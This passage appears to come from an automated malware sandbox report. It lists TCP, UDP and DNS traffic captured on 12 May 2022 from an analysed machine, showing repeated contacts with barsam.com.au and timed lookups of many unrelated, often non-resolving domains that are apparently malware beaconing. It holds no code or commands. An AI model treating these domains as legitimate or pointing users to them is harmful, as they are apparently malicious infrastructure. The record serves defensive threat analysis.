                                                                                                                            May 12, 2022 10:41:58.653402090 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.653448105 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.653496981 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.653521061 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.653547049 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.653563976 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.653611898 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.653656960 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.653702974 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.653717041 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.653748989 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.653755903 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.653886080 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.653892994 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.653930902 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.653934002 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.653980970 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654026031 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654061079 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.654071093 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654118061 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654251099 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654297113 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654341936 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654390097 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654529095 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654578924 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654609919 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.654623985 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654723883 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654771090 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654786110 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.654817104 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654863119 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654907942 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654953003 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.654963970 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.654998064 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655045033 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655088902 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655133963 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655179977 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655184984 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.655224085 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.655225992 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655272007 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655316114 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655360937 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655369043 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.655407906 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655411005 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.655435085 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.655445099 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.655455112 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655502081 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655546904 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655592918 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655637980 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655661106 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.655683041 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655703068 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.655730009 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655775070 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655819893 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655846119 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.655865908 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655886889 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.655898094 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.655913115 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.655961037 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656006098 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656021118 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656050920 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656069040 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656086922 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656097889 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656100035 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656143904 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656147957 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656191111 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656236887 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656282902 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656282902 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656321049 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656327963 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656373978 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656419039 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656430006 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656454086 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656462908 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656464100 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656471014 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656510115 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656555891 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656585932 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656596899 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656600952 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656647921 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656692982 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656738997 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656763077 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656773090 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656781912 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656783104 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:41:58.656790018 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656874895 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.656897068 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:41:58.657028913 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:42:11.909034014 CEST4974680192.168.11.2093.184.220.29
                                                                                                                            May 12, 2022 10:42:12.334876060 CEST804973093.184.220.29192.168.11.20
                                                                                                                            May 12, 2022 10:42:12.335098028 CEST4973080192.168.11.2093.184.220.29
                                                                                                                            May 12, 2022 10:42:12.448786020 CEST804973293.184.220.29192.168.11.20
                                                                                                                            May 12, 2022 10:42:12.449022055 CEST4973280192.168.11.2093.184.220.29
                                                                                                                            May 12, 2022 10:42:12.697405100 CEST804973193.184.220.29192.168.11.20
                                                                                                                            May 12, 2022 10:42:12.697647095 CEST4973180192.168.11.2093.184.220.29
                                                                                                                            May 12, 2022 10:42:13.552973032 CEST804974593.184.220.29192.168.11.20
                                                                                                                            May 12, 2022 10:42:13.553183079 CEST4974580192.168.11.2093.184.220.29
                                                                                                                            May 12, 2022 10:42:28.919495106 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:42:28.919574022 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:42:28.919687033 CEST8049758203.170.86.89192.168.11.20
                                                                                                                            May 12, 2022 10:42:36.937597990 CEST4975880192.168.11.20203.170.86.89
                                                                                                                            May 12, 2022 10:43:00.958743095 CEST4973080192.168.11.2093.184.220.29
                                                                                                                            May 12, 2022 10:43:00.958743095 CEST4973180192.168.11.2093.184.220.29
                                                                                                                            May 12, 2022 10:43:00.958856106 CEST4973280192.168.11.2093.184.220.29
                                                                                                                            May 12, 2022 10:43:00.966990948 CEST804973293.184.220.29192.168.11.20
                                                                                                                            May 12, 2022 10:43:00.967195988 CEST4973280192.168.11.2093.184.220.29
                                                                                                                            May 12, 2022 10:43:00.968199968 CEST804973093.184.220.29192.168.11.20
                                                                                                                            May 12, 2022 10:43:00.968386889 CEST4973080192.168.11.2093.184.220.29
                                                                                                                            May 12, 2022 10:43:00.969702005 CEST804973193.184.220.29192.168.11.20
                                                                                                                            May 12, 2022 10:43:00.969890118 CEST4973180192.168.11.2093.184.220.29
                                                                                                                            May 12, 2022 10:43:01.849149942 CEST4974580192.168.11.2093.184.220.29
                                                                                                                            May 12, 2022 10:43:01.859951973 CEST804974593.184.220.29192.168.11.20
                                                                                                                            May 12, 2022 10:43:01.860184908 CEST4974580192.168.11.2093.184.220.29
                                                                                                                            May 12, 2022 10:45:21.980022907 CEST4976880192.168.11.2041.203.18.177
                                                                                                                            May 12, 2022 10:45:22.157623053 CEST804976841.203.18.177192.168.11.20
                                                                                                                            May 12, 2022 10:45:22.157933950 CEST4976880192.168.11.2041.203.18.177
                                                                                                                            May 12, 2022 10:45:22.157984972 CEST4976880192.168.11.2041.203.18.177
                                                                                                                            May 12, 2022 10:45:22.336025953 CEST804976841.203.18.177192.168.11.20
                                                                                                                            May 12, 2022 10:45:22.336102009 CEST804976841.203.18.177192.168.11.20
                                                                                                                            May 12, 2022 10:45:22.336150885 CEST804976841.203.18.177192.168.11.20
                                                                                                                            May 12, 2022 10:45:22.336572886 CEST4976880192.168.11.2041.203.18.177
                                                                                                                            May 12, 2022 10:45:22.336673975 CEST4976880192.168.11.2041.203.18.177
                                                                                                                            May 12, 2022 10:45:22.514661074 CEST804976841.203.18.177192.168.11.20
                                                                                                                            May 12, 2022 10:46:43.551373005 CEST4977080192.168.11.203.64.163.50
                                                                                                                            May 12, 2022 10:46:43.561932087 CEST80497703.64.163.50192.168.11.20
                                                                                                                            May 12, 2022 10:46:43.562241077 CEST4977080192.168.11.203.64.163.50
                                                                                                                            May 12, 2022 10:46:43.562331915 CEST4977080192.168.11.203.64.163.50
                                                                                                                            May 12, 2022 10:46:43.572643995 CEST80497703.64.163.50192.168.11.20
                                                                                                                            May 12, 2022 10:46:43.572695017 CEST80497703.64.163.50192.168.11.20
                                                                                                                            May 12, 2022 10:46:43.572730064 CEST80497703.64.163.50192.168.11.20
                                                                                                                            May 12, 2022 10:46:43.572958946 CEST4977080192.168.11.203.64.163.50
                                                                                                                            May 12, 2022 10:46:43.573041916 CEST4977080192.168.11.203.64.163.50
                                                                                                                            May 12, 2022 10:46:43.583214045 CEST80497703.64.163.50192.168.11.20
                                                                                                                            May 12, 2022 10:48:03.194797993 CEST4977380192.168.11.20192.64.117.165
                                                                                                                            May 12, 2022 10:48:03.358239889 CEST8049773192.64.117.165192.168.11.20
                                                                                                                            May 12, 2022 10:48:03.358625889 CEST4977380192.168.11.20192.64.117.165
                                                                                                                            May 12, 2022 10:48:03.358728886 CEST4977380192.168.11.20192.64.117.165
                                                                                                                            May 12, 2022 10:48:03.525044918 CEST8049773192.64.117.165192.168.11.20
                                                                                                                            May 12, 2022 10:48:03.525105953 CEST8049773192.64.117.165192.168.11.20
                                                                                                                            May 12, 2022 10:48:03.525407076 CEST4977380192.168.11.20192.64.117.165
                                                                                                                            May 12, 2022 10:48:03.525470018 CEST4977380192.168.11.20192.64.117.165
                                                                                                                            May 12, 2022 10:48:03.688616037 CEST8049773192.64.117.165192.168.11.20
                                                                                                                            May 12, 2022 10:48:23.691339970 CEST4977480192.168.11.2068.65.122.211
                                                                                                                            May 12, 2022 10:48:23.850302935 CEST804977468.65.122.211192.168.11.20
                                                                                                                            May 12, 2022 10:48:23.850637913 CEST4977480192.168.11.2068.65.122.211
                                                                                                                            May 12, 2022 10:48:23.850701094 CEST4977480192.168.11.2068.65.122.211
                                                                                                                            May 12, 2022 10:48:24.014839888 CEST804977468.65.122.211192.168.11.20
                                                                                                                            May 12, 2022 10:48:24.014894962 CEST804977468.65.122.211192.168.11.20
                                                                                                                            May 12, 2022 10:48:24.015168905 CEST4977480192.168.11.2068.65.122.211
                                                                                                                            May 12, 2022 10:48:24.015249968 CEST4977480192.168.11.2068.65.122.211
                                                                                                                            May 12, 2022 10:48:24.176893950 CEST804977468.65.122.211192.168.11.20
                                                                                                                            May 12, 2022 10:49:05.552524090 CEST4977580192.168.11.2023.227.38.74
                                                                                                                            May 12, 2022 10:49:05.560606956 CEST804977523.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:05.560832977 CEST4977580192.168.11.2023.227.38.74
                                                                                                                            May 12, 2022 10:49:05.560945034 CEST4977580192.168.11.2023.227.38.74
                                                                                                                            May 12, 2022 10:49:05.568945885 CEST804977523.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:05.660070896 CEST804977523.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:05.660132885 CEST804977523.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:05.660181046 CEST804977523.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:05.660227060 CEST804977523.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:05.660263062 CEST804977523.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:05.660295010 CEST804977523.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:05.660327911 CEST804977523.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:05.660444021 CEST4977580192.168.11.2023.227.38.74
                                                                                                                            May 12, 2022 10:49:05.660562038 CEST4977580192.168.11.2023.227.38.74
                                                                                                                            May 12, 2022 10:49:05.660626888 CEST4977580192.168.11.2023.227.38.74
                                                                                                                            May 12, 2022 10:49:05.660640001 CEST4977580192.168.11.2023.227.38.74
                                                                                                                            May 12, 2022 10:49:26.017709970 CEST4977680192.168.11.2023.227.38.74
                                                                                                                            May 12, 2022 10:49:26.025731087 CEST804977623.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:26.026335001 CEST4977680192.168.11.2023.227.38.74
                                                                                                                            May 12, 2022 10:49:26.026441097 CEST4977680192.168.11.2023.227.38.74
                                                                                                                            May 12, 2022 10:49:26.034445047 CEST804977623.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:26.084886074 CEST804977623.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:26.084947109 CEST804977623.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:26.084994078 CEST804977623.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:26.085040092 CEST804977623.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:26.085084915 CEST804977623.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:26.085108042 CEST804977623.227.38.74192.168.11.20
                                                                                                                            May 12, 2022 10:49:26.085194111 CEST4977680192.168.11.2023.227.38.74
                                                                                                                            May 12, 2022 10:49:26.085364103 CEST4977680192.168.11.2023.227.38.74
                                                                                                                            May 12, 2022 10:49:26.085433006 CEST4977680192.168.11.2023.227.38.74

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            May 12, 2022 10:41:57.543518066 CEST5434053192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:41:57.582669973 CEST53543401.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:43:17.956446886 CEST6162453192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:43:18.278492928 CEST53616241.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:43:38.435621023 CEST6233453192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:43:38.451487064 CEST53623341.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:43:58.602623940 CEST5640153192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:43:58.782552004 CEST53564011.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:44:39.078141928 CEST5182553192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:44:39.122493029 CEST53518251.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:44:59.262598038 CEST5219153192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:44:59.444937944 CEST53521911.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:45:21.600013971 CEST5139553192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:45:21.978955984 CEST53513951.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:45:40.471077919 CEST5718253192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:45:40.940191031 CEST53571821.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:46:01.091320038 CEST5053653192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:46:01.101995945 CEST53505361.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:46:21.242948055 CEST5850653192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:46:22.258364916 CEST5850653192.168.11.209.9.9.9
                                                                                                                            May 12, 2022 10:46:23.273663044 CEST5850653192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:46:25.288711071 CEST5850653192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:46:25.288805962 CEST5850653192.168.11.209.9.9.9
                                                                                                                            May 12, 2022 10:46:27.206789017 CEST53585061.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:46:27.207256079 CEST53585061.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:46:27.207345009 CEST53585061.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:46:27.207519054 CEST5850653192.168.11.209.9.9.9
                                                                                                                            May 12, 2022 10:46:43.316648960 CEST5997453192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:46:43.550352097 CEST53599741.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:47:03.718409061 CEST5781253192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:47:04.733216047 CEST5781253192.168.11.209.9.9.9
                                                                                                                            May 12, 2022 10:47:05.748406887 CEST5781253192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:47:06.977725029 CEST53578121.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:47:06.977782011 CEST53578121.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:47:06.978247881 CEST5781253192.168.11.209.9.9.9
                                                                                                                            May 12, 2022 10:47:06.978338003 CEST5781253192.168.11.209.9.9.9
                                                                                                                            May 12, 2022 10:47:08.549395084 CEST53578129.9.9.9192.168.11.20
                                                                                                                            May 12, 2022 10:47:08.549439907 CEST53578129.9.9.9192.168.11.20
                                                                                                                            May 12, 2022 10:47:22.651705980 CEST5612453192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:47:22.668067932 CEST53561241.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:47:42.818762064 CEST5565853192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:47:43.035773993 CEST53556581.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:48:03.173616886 CEST6437953192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:48:03.193999052 CEST53643791.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:48:23.669287920 CEST6408353192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:48:23.690448046 CEST53640831.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:48:48.929251909 CEST6229253192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:48:49.050848007 CEST53622921.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:48:49.051558971 CEST6229253192.168.11.209.9.9.9
                                                                                                                            May 12, 2022 10:48:49.378640890 CEST53622929.9.9.9192.168.11.20
                                                                                                                            May 12, 2022 10:49:05.488022089 CEST5672953192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:49:05.551645994 CEST53567291.1.1.1192.168.11.20
                                                                                                                            May 12, 2022 10:49:25.812568903 CEST5840153192.168.11.201.1.1.1
                                                                                                                            May 12, 2022 10:49:26.016906977 CEST53584011.1.1.1192.168.11.20

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                            May 12, 2022 10:41:57.543518066 CEST192.168.11.201.1.1.10x1628Standard query (0)barsam.com.auA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:43:17.956446886 CEST192.168.11.201.1.1.10xeefcStandard query (0)www.sura.oooA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:43:38.435621023 CEST192.168.11.201.1.1.10x3639Standard query (0)www.perrobravostudio.comA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:43:58.602623940 CEST192.168.11.201.1.1.10x1e29Standard query (0)www.reionsbank.comA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:44:39.078141928 CEST192.168.11.201.1.1.10x672cStandard query (0)www.gpusforfun.comA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:44:59.262598038 CEST192.168.11.201.1.1.10x5c8fStandard query (0)www.hokasneakeruse.xyzA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:45:21.600013971 CEST192.168.11.201.1.1.10xf819Standard query (0)www.fungismartgrid.comA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:45:40.471077919 CEST192.168.11.201.1.1.10xdaf4Standard query (0)www.shantelleketodietofficial.siteA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:46:01.091320038 CEST192.168.11.201.1.1.10x27a0Standard query (0)www.taakyif.comA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:46:21.242948055 CEST192.168.11.201.1.1.10xc51eStandard query (0)www.rnrr.xyzA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:46:22.258364916 CEST192.168.11.209.9.9.90xc51eStandard query (0)www.rnrr.xyzA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:46:23.273663044 CEST192.168.11.201.1.1.10xc51eStandard query (0)www.rnrr.xyzA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:46:25.288711071 CEST192.168.11.201.1.1.10xc51eStandard query (0)www.rnrr.xyzA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:46:25.288805962 CEST192.168.11.209.9.9.90xc51eStandard query (0)www.rnrr.xyzA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:46:27.207519054 CEST192.168.11.209.9.9.90xc51eStandard query (0)www.rnrr.xyzA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:46:43.316648960 CEST192.168.11.201.1.1.10xe297Standard query (0)www.intelios.xyzA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:47:03.718409061 CEST192.168.11.201.1.1.10x826dStandard query (0)www.ayanaslifeinmalaysia.comA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:47:04.733216047 CEST192.168.11.209.9.9.90x826dStandard query (0)www.ayanaslifeinmalaysia.comA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:47:05.748406887 CEST192.168.11.201.1.1.10x826dStandard query (0)www.ayanaslifeinmalaysia.comA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:47:06.978247881 CEST192.168.11.209.9.9.90x826dStandard query (0)www.ayanaslifeinmalaysia.comA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:47:06.978338003 CEST192.168.11.209.9.9.90x826dStandard query (0)www.ayanaslifeinmalaysia.comA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:47:22.651705980 CEST192.168.11.201.1.1.10x716dStandard query (0)www.kbcoastalproperties.comA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:47:42.818762064 CEST192.168.11.201.1.1.10x98a7Standard query (0)www.thebeautystore.storeA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:48:03.173616886 CEST192.168.11.201.1.1.10x9616Standard query (0)www.herbalsfixng.xyzA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:48:23.669287920 CEST192.168.11.201.1.1.10xb9b6Standard query (0)www.schnellekreditfinanz.comA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:48:48.929251909 CEST192.168.11.201.1.1.10xfcc7Standard query (0)www.liesdevocalist.storeA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:48:49.051558971 CEST192.168.11.209.9.9.90xfcc7Standard query (0)www.liesdevocalist.storeA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:49:05.488022089 CEST192.168.11.201.1.1.10x1087Standard query (0)www.nelvashop.comA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:49:25.812568903 CEST192.168.11.201.1.1.10xa63Standard query (0)www.threads34.storeA (IP address)IN (0x0001)

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                            May 12, 2022 10:41:57.582669973 CEST1.1.1.1192.168.11.200x1628No error (0)barsam.com.au203.170.86.89A (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:43:18.278492928 CEST1.1.1.1192.168.11.200xeefcName error (3)www.sura.ooononenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:43:38.451487064 CEST1.1.1.1192.168.11.200x3639Name error (3)www.perrobravostudio.comnonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:43:58.782552004 CEST1.1.1.1192.168.11.200x1e29Name error (3)www.reionsbank.comnonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:44:39.122493029 CEST1.1.1.1192.168.11.200x672cName error (3)www.gpusforfun.comnonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:44:59.444937944 CEST1.1.1.1192.168.11.200x5c8fName error (3)www.hokasneakeruse.xyznonenoneA (IP address)IN (0x0001)
                                                                                                                            May 12, 2022 10:45:21.978955984 CEST1.1.1.1192.168.11.200xf819No error (0)www.fungismartgrid.com41.203.18.177A (IP address)IN (0x0001)
